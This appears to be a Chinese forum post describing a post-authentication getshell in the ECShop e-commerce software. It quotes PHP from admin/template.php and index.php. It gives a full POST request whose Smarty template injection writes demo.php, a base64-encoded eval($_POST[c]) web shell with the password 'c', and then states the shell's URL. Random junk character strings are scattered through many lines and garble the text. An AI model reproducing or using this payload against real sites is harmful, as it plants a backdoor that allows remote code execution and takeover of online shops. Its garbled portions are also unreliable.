Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板

而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
; D- P$ K9 L! J) r但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
admin/template.php

1 `. c8 B) h  \0 x9 `, l6 K' s. e9 P1 if ($_REQUEST['act'] == 'update_library')

2   
: \" l; l# t+ e7 K! ~. ]
3 {

, b% b& [9 B+ }7 ?& G4     check_authz_json('library_manage');
# q* i* p4 N! v; `
: C9 x; I6 c; `  ~5 M& A& `& |6 e5   

6     $html = stripslashes(json_str_iconv($_POST['html']));

7   
  J1 }( c9 m3 T7 z* T0 h
8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件
1 M. A! L. n& x7 a' D
9   
/ Y& z" K' R3 \
10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符

11   

12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));

# Q. Q  v9 `% @8 _  `* \- x13   

$ D. G, s9 J# D* S14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出
  y) I$ C/ w1 j! P
: Y! W. m6 m! o: p3 N0 v* M  Y# `15     {

16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);

17         make_json_result('', $_LANG['update_lib_success']);
3 ~8 F$ Y8 x$ w2 j8 z
3 ]1 ^, ?0 ~' ?* b18     }

( t7 d+ I3 |, q19     else

  y0 r/ v$ q! b; v3 m20     {
0 v/ Z* X9 P. \1 o: r  r7 g4 J- U
% \' K6 z8 _* P9 U. p; _- a21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));
9 n6 P9 B3 r3 ]4 {2 Q" a. V
22     }

) F. V7 w$ W. ?/ c. ^# f23 }
, T7 q+ Q$ O9 _7 t- K
2 \" w2 a5 J2 @) u0 A. u那么找个比较方便调用了模板的文件
index.php
5 V* A* [: M- A4 ]# I) K( p& i
1 if ($act == 'cat_rec')
, h( m; z* w* J9 v2 [4 J
2   
  V4 o7 @- p( w8 I9 T- Y: H' ?& L1 R
- O2 ?# C* E' C5 b! R5 L( S6 s3 {

4   

9 A6 v' L& f# |* |6 t5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');

6   
! a# i2 ^# Y" W& {2 Y* ?
7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';

& t3 G, n' o" j8   
0 x* ^) |7 A% v5 f( d
9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';
( ~( R! U+ _" y# F
9 o0 x  M  G$ ~10   
; N; E1 z9 J/ c0 i+ c
11     include_once('includes/cls_json.php');
. j/ Z8 M4 @3 V4 w4 N. `
$ R1 K& i- W4 ^: e12   
* I' s$ e+ V: V5 P$ Y; O
$ d- h' i9 t1 T# R8 N$ ]13     $json = new JSON;
% ]9 u8 r: L: g* c
# [' u( h5 g, j: H" H14   
9 n3 O4 A; K5 H2 E. C  c
+ S& @1 x+ c3 d* f( z# n15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);

7 J/ J1 Z# Q5 I) `7 y, k& X16   
$ G! E# l2 e7 _& K, D4 N1 n0 ?
17     $children = get_children($cat_id);

18   
- w7 s6 h+ R' W% P% d% n
6 M: x& i$ c1 @0 o" c! X* X4 N19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品

) l2 _. @! l7 \7 J20   
1 [5 r6 ~5 G+ `0 Q! ?* d
21     $smarty->assign('cat_rec_sign', 1);
0 j7 b% X  h4 {# n. \
- m$ @' V% S7 i( o3 {7 K22   
+ K' ?1 h9 J+ C+ D- \* Y
23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best

24   
; w/ r1 V7 }( ~' h2 K+ a# y- |
25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';
# U$ N' F1 r( s- f+ }0 ^% N
6 m( V& q5 E7 |7 N26   
, x8 V7 q: q+ J; r9 [0 a) ]% k: D( f
27         echo $rec_array[$rec_type];
5 z. Z9 [0 K2 @9 a9 m
28   

29     die($json->encode($result));
/ b. e3 I5 Z+ n0 g7 b# {' _" Z
30   
& v: `6 ^1 r* Q" v# J0 o6 z1 L
31 }
1 o- u0 g7 Q* i
那么就有利用方法了
% m( `, B" M4 epost包到http://localhost/ec/admin/template.php?act=update_library
; W5 p4 I8 q) X1 LPost内容：
& B, p  Q* ~1 P% S( a
% O6 k) q. f! G1 e( i. j+ f- g​
3 i  v0 F  ?3 X8 Z1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}
. d8 x; `5 y/ M, O6 e0 V
( m; i+ _% e) @: f% ~( K9 U然后访问http://localhost/ec/index.php?act=cat_rec

+ s4 D* ~) ]% O  nshel地址：http://localhost/ec/demo.php
9 E# E: s$ d; `. y, H0 ]' i: W' \密码c
2 C$ f' J* N) L* Y4 f